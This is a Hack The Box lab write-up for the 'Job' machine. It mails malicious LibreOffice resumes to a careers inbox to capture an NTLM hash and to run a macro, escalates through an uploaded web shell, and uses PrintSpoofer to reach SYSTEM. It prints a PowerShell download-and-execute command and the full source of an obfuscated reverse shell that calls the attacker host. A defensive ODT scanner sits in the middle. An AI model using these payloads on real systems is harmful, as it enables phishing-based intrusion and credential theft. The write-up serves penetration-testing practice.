HTB | Job
Machine - https://app.hackthebox.com/machines/Job
IP - 10.129.234.73
NMAP
└─$ nmap -sC -sV -p 25,80,445,3389,5985 10.129.234.73 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-10 19:23 IST
Nmap scan report for 10.129.234.73
Host is up (1.4s latency).
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-10T13:56:08+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=job
| Not valid before: 2025-09-04T13:43:05
|_Not valid after:  2026-03-06T13:43:05
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-10-10T13:55:37
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.61 seconds
Port 80

There is only a single webpage, which lists the email address career@job.local and asks applicants to send in their resume.
whatweb
└─$ whatweb -v -a 3 http://Job.local/
WhatWeb report for http://Job.local/
Status    : 200 OK
Title     : Job.local
IP        : 10.129.234.73
Country   : RESERVED, ZZ
Summary   : Bootstrap, Email[career@job.loca], HTML5, HTTPServer[Microsoft-IIS/10.0], Microsoft-IIS[10.0], Script, X-Powered-By[ASP.NET]
Detected Plugins:
[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 
        Website     : https://getbootstrap.com/
[ Email ]
        Extract email addresses. Find valid email address and 
        syntactically invalid email addresses from mailto: link 
        tags. We match syntactically invalid links containing 
        mailto: to catch anti-spam email addresses, eg. bob at 
        gmail.com. This uses the simplified email regular 
        expression from 
        http://www.regular-expressions.info/email.html for valid 
        email address matching. 
        String       : career@job.loca
[ HTML5 ]
        HTML version 5, detected by the doctype declaration 
[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 
        String       : Microsoft-IIS/10.0 (from server string)
[ Microsoft-IIS ]
        Microsoft Internet Information Services (IIS) for Windows 
        Server is a flexible, secure and easy-to-manage Web server 
        for hosting anything on the Web. From media streaming to 
        web application hosting, IIS's scalable and open 
        architecture is ready to handle the most demanding tasks. 
        Version      : 10.0
        Website     : http://www.iis.net/
[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 
[ X-Powered-By ]
        X-Powered-By HTTP header 
        String       : ASP.NET (from x-powered-by string)
HTTP Headers:
        HTTP/1.1 200 OK
        Content-Type: text/html
        Last-Modified: Sun, 07 Nov 2021 13:05:58 GMT
        Accept-Ranges: bytes
        ETag: "0bf9f34d8d3d71:0"
        Server: Microsoft-IIS/10.0
        X-Powered-By: ASP.NET
        Date: Fri, 10 Oct 2025 14:01:04 GMT
        Connection: close
        Content-Length: 3261
dirsearch
Nothing interesting was found.
└─$ dirsearch -u http://job.local/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 29999
Output File: /home/anurag/htb/Job/reports/http_job.local/__25-10-10_19-31-44.txt
Target: http://job.local/
[19:31:44] Starting:
[19:32:12] 301 -  144B  - /css  ->  http://job.local/css/
[19:32:12] 301 -  143B  - /js  ->  http://job.local/js/
[19:32:16] 301 -  154B  - /aspnet_client  ->  http://job.local/aspnet_client/
[19:32:19] 301 -  147B  - /assets  ->  http://job.local/assets/
[19:32:38] 301 -  144B  - /CSS  ->  http://job.local/CSS/
[19:33:03] 301 -  143B  - /JS  ->  http://job.local/JS/
[19:33:06] 301 -  147B  - /Assets  ->  http://job.local/Assets/
[19:33:19] 301 -  143B  - /Js  ->  http://job.local/Js/
[19:33:19] 301 -  144B  - /Css  ->  http://job.local/Css/
[19:40:26] 301 -  154B  - /Aspnet_client  ->  http://job.local/Aspnet_client/
[19:46:14] 301 -  154B  - /aspnet_Client  ->  http://job.local/aspnet_Client/
[19:57:08] 301 -  154B  - /ASPNET_CLIENT  ->  http://job.local/ASPNET_CLIENT/
[20:02:25] 400 -  324B  - /error%1F_log

Task Completed
Port 25
We can try sending mail to it using sendemail.
The webpage asks applicants to send their CV as a LibreOffice document, so we will mail a malicious .odt file and try to capture the NetNTLM hash when it is opened.
Let’s use this GitHub repo to create the .odt file.
└─$ python3 badodt.py
/home/anurag/htb/Job/badodf/badodt.py:13: SyntaxWarning: invalid escape sequence '\/'
  / __ )____ _____/ /     / __ \/ __ \/ ____/
    ____            __      ____  ____  ______
   / __ )____ _____/ /     / __ \/ __ \/ ____/
  / __  / __ `/ __  /_____/ / / / / / / /_
 / /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/
/_____/\__,_/\__,_/      \____/_____/_/
Create a malicious ODF document help leak NetNTLM Creds
By Richard Davy 
@rd_pentest
Python3 version by @gustanini
www.secureyourit.co.uk
Please enter IP of listener: 10.10.16.27
/home/anurag/htb/Job/badodf/bad.odt successfully created
Now it’s time for testing. It did not work, for some reason.
Now I will try msfconsole to create the .odt file instead.
└─$ sudo msfconsole
[sudo] password for anurag: 
Metasploit tip: Use sessions -1 to interact with the last opened session
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v6.4.18-dev                          ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use auxiliary/fileformat/odt_badodt
msf6 auxiliary(fileformat/odt_badodt) > set filename resume.odt
filename => resume.odt
msf6 auxiliary(fileformat/odt_badodt) > set lhost 10.10.16.27
lhost => 10.10.16.27
msf6 auxiliary(fileformat/odt_badodt) > run
[*] Generating Malicious ODT File 
[*] SMB Listener Address will be set to 10.10.16.27
[+] resume.odt stored at /root/.msf4/local/resume.odt
[*] Auxiliary module execution completed
msf6 auxiliary(fileformat/odt_badodt) >
Now I start my SMB listener and send the mail.
└─$ sendemail -f 'anurag@lookingforajob.com' -t 'career@job.local' -s 10.129.234.73:25 -u 'Resume' -m 'Attaching my resume for your reference' -a 'resume.odt'
Oct 10 21:17:05 anurag sendemail[98615]: Email was sent successfully!
On the listener, I got the hash:
└─$ impacket-smbserver share . -smb2support 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.234.73,65248)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:565ca1c42f3725fae418656b463a361d:010100000000000000c0ba24fd39dc01c8e7758b646173e100000000010010007a006d004d004b005000470068004700030010007a006d004d004b0050004700680047000200100072006a0055006f0071006100660077000400100072006a0055006f0071006100660077000700080000c0ba24fd39dc0106000400020000000800300030000000000000000000000000200000994b80cab985d99ebf724c7858c50336740c7475be965e3f6f42d2c1c88503160a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00320037000000000000000000
[*] Closing down connection (10.129.234.73,65248)
Let’s try to crack the hash, but it does not crack.
$ hashcat jack_hash.txt /home/anurag/stuff/rockyou.txt  
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 3550H with Radeon Vega Mobile Gfx, 1438/2941 MB (512 MB allocatable), 3MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /home/anurag/stuff/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?                 
* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
  This can cause your screen to lag.
* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.           
Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JACK.BLACK::JOB:aaaaaaaaaaaaaaaa:565ca1c42f3725fae4...000000
Time.Started.....: Fri Oct 10 21:40:18 2025 (20 secs)
Time.Estimated...: Fri Oct 10 21:40:38 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/anurag/stuff/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   810.9 kH/s (0.65ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2121216a696d212121] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 65%
Started: Fri Oct 10 21:40:08 2025
Stopped: Fri Oct 10 21:40:40 2025
Foothold / shell
Shell as jack.black
Getting shell via ODT file
I will use msfconsole for the exploit
msf6 > use multi/misc/openoffice_document_macro
msf6 exploit(multi/misc/openoffice_document_macro) > set lhost 10.10.14.15
msf6 exploit(multi/misc/openoffice_document_macro) > set lport 80
msf6 exploit(multi/misc/openoffice_document_macro) > set payload windows/x64/exec
msf6 exploit(multi/misc/openoffice_document_macro) > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.15/Invoke-PowerShellTcpEx.ps1');"
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Using URL: http://10.10.14.15:8080/WyHDPdQBH
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /root/.msf4/local/msf.odt
└─$ cat Invoke-PowerShellTcpEx.ps1         
function Power
{ 
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(
        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,
        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,
        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )
    
    try 
    {
        $String = "stekcoS.teN"
        $class = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
        if ($Reverse)
        {
            $client = New-Object System.$class.TCPClient($IPAddress,$Port)
        }
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()    
            $client = $listener.AcceptTcpClient()
        } 
        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}
        $sbs = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sbs,0,$sbs.Length)
        $sbs = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sbs,0,$sbs.Length)
        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target." 
                Write-Error $_
            }
            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x
            $sb = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sb,0,$sb.Length)
            $stream.Flush()  
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}
Power -Reverse -IPAddress 10.10.14.15 -Port 9001
Let’s download WyHDPdQBH and replace it with a copy of Invoke-PowerShellTcpEx.ps1 under that name.
└─$ wget http://10.10.14.15:8080/WyHDPdQBH
--2025-10-14 20:06:36--  http://10.10.14.15:8080/WyHDPdQBH
Connecting to 10.10.14.15:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3650 (3.6K) [application/octet-stream]
Saving to: ‘WyHDPdQBH’
WyHDPdQBH                 100%[==================================>]   3.56K  --.-KB/s    in 0s
2025-10-14 20:06:36 (186 MB/s) - ‘WyHDPdQBH’ saved [3650/3650]

┌──(anurag㉿anurag)-[~/htb/Job]
└─$ cp Invoke-PowerShellTcpEx.ps1 WyHDPdQBH
Now let’s send the mail
#set up the listener
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.146.164 - - [14/Oct/2025 20:10:22] "GET /Invoke-PowerShellTcpEx.ps1 HTTP/1.1" 200 -
└─$ sendemail -f 'anurag@lookingforajob.com' -t 'career@job.local' -s 10.129.146.164:25 -u 'Resume' -m 'Attaching my resume for your reference' -a msf.odt
Oct 14 20:09:57 anurag sendemail[79254]: Email was sent successfully!
#on msf
[*] 10.129.146.164   openoffice_document_macro - Sending payload
#on listener
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.146.164] 49811
Windows PowerShell running as user jack.black on JOB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files\LibreOffice\program>
Found user.txt
 Directory of C:\Users\jack.black\Desktop
11/09/2021  09:43 PM    <DIR>          .
04/16/2025  10:48 AM    <DIR>          ..
10/14/2025  01:39 PM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   5,411,229,696 bytes free
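Both lures used above depend on features a mail gateway can inspect before a document reaches the hiring mailbox: the odt_badodt document carries an image link to a UNC path that LibreOffice resolves over SMB (which is why impacket-smbserver received jack.black's NetNTLMv2 response), and the openoffice_document_macro document ships a Basic library under Basic/ and binds it to a document event. The scanner below is an added example written for this writeup, not code from badodt.py, Metasploit or the author; the two sample documents it builds are constructed fixtures, and the listener address 10.10.16.27 and the dom:load event binding are assumptions based on the session above.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# A UNC path or smb:// URI makes the office suite authenticate to that host when it renders.
UNC_RE = re.compile(r"^(?:\\\\|//)[^\\/]+[\\/]|^smb://", re.IGNORECASE)
SCRIPT_URI = "vnd.sun.star.script:"   # ODF URI scheme for macros bound to document events

def iter_hrefs(xml_bytes):
    """Yield (local tag, href) for every element carrying an href attribute."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return
    for el in root.iter():
        for attr, value in el.attrib.items():
            if attr.endswith("}href") or attr == "href":
                yield el.tag.split("}")[-1], value

def scan_odt(data):
    """Return [(member, finding, detail)] for an ODF package held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            if not member.endswith(".xml"):
                continue
            # Basic libraries ship under Basic/ (script-lc.xml indexes them).
            if member.startswith("Basic/"):
                findings.append((member, "macro-library", member))
            for tag, href in iter_hrefs(zf.read(member)):
                if href.startswith(SCRIPT_URI):
                    findings.append((member, "event-listener", f"{tag} -> {href}"))
                elif UNC_RE.search(href):
                    findings.append((member, "unc-reference", f"{tag} -> {href}"))
    return findings

def verdict(findings):
    """Gateway decision: block on a UNC link or an auto-run macro, review anything else."""
    kinds = {kind for _, kind, _ in findings}
    if kinds & {"unc-reference", "event-listener"}:
        return "block"
    return "review" if kinds else "allow"

NS = ('xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
      'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
      'xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" '
      'xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" '
      'xmlns:xlink="http://www.w3.org/1999/xlink"')

def build_sample_odt(lure, listener="10.10.16.27"):
    """Constructed fixture: a plain document, or one shaped like the resume lure above."""
    scripts, body = "", "<text:p>Resume</text:p>"
    if lure:
        scripts = ('<office:scripts><office:event-listeners><script:event-listener '
                   'script:language="ooo:script" script:event-name="dom:load" '
                   'xlink:href="vnd.sun.star.script:Standard.Module1.Main'
                   '?language=Basic&amp;location=document"/>'
                   '</office:event-listeners></office:scripts>')
        body += (f'<text:p><draw:frame><draw:image xlink:href="\\\\{listener}'
                 '\\share\\logo.png"/></draw:frame></text:p>')
    content = (f'<office:document-content {NS}>{scripts}<office:body>'
               f'<office:text>{body}</office:text></office:body></office:document-content>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text",
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("content.xml", content)
        if lure:  # empty library stubs: enough to show where a gateway should look
            zf.writestr("Basic/script-lc.xml", '<library:libraries '
                        'xmlns:library="http://openoffice.org/2000/library"/>')
            zf.writestr("Basic/Standard/Module1.xml", '<script:module xmlns:script='
                        '"http://openoffice.org/2000/script" script:name="Module1"/>')
    return buf.getvalue()

if __name__ == "__main__":
    hits = scan_odt(build_sample_odt(True))
    print(verdict(hits), hits)
```

scan_odt takes the raw bytes of any .odt, so the same check runs over a real attachment; the loop reads every .xml member, so links placed in styles.xml or settings.xml are caught the same way as content.xml.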
Privilege Escalation
Shell as iis apppool\defaultapppool
File upload on wwwroot
The user job\jack.black is a member of the JOB\developers group, which is explicitly granted FullControl on C:\inetpub\wwwroot.
PS C:\inetpub\wwwroot> (Get-Acl .).Access | Format-Table IdentityReference,FileSystemRights,AccessControlType -AutoSize
IdentityReference                      FileSystemRights AccessControlType
-----------------                      ---------------- -----------------
BUILTIN\IIS_IUSRS            ReadAndExecute, Synchronize             Allow
JOB\developers                               FullControl             Allow
NT SERVICE\TrustedInstaller                  FullControl             Allow
NT SERVICE\TrustedInstaller                    268435456             Allow
NT AUTHORITY\SYSTEM                          FullControl             Allow
NT AUTHORITY\SYSTEM                            268435456             Allow
BUILTIN\Administrators                       FullControl             Allow
BUILTIN\Administrators                         268435456             Allow
BUILTIN\Users                ReadAndExecute, Synchronize             Allow
BUILTIN\Users                                -1610612736             Allow
CREATOR OWNER                                 268435456             Allow
PS C:\inetpub\wwwroot> whoami
job\jack.black
PS C:\inetpub\wwwroot> whoami /groups
GROUP INFORMATION
-----------------
Group Name                             Type             SID                                           Attributes
====================================== ================ ============================================= ==================================================
Everyone                               Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
JOB\developers                         Alias            S-1-5-21-3629909232-404814612-4151782453-1001 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users           Alias            S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192
PS C:\inetpub\wwwroot>
Let’s upload shell.aspx to wwwroot, load http://10.129.146.164/shell.aspx, and on the listener:
└─$ nc -nlvp 1234  
listening on [any] 1234 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.146.164] 49817
Spawn Shell...
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
SeImpersonatePrivilege
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
c:\windows\system32\inetsrv>
Since the app pool identity holds SeImpersonatePrivilege, it’s time to use the potato attack (PrintSpoofer here), and we are nt authority\system.
PS C:\temp> .\PrintSpoofer64.exe -i -c cmd
.\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
And we got the root.txt
 Directory of C:\Users\Administrator\Desktop
11/10/2021  05:45 PM    <DIR>          .
11/09/2021  08:51 PM    <DIR>          ..
10/14/2025  01:39 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   5,397,835,776 bytes free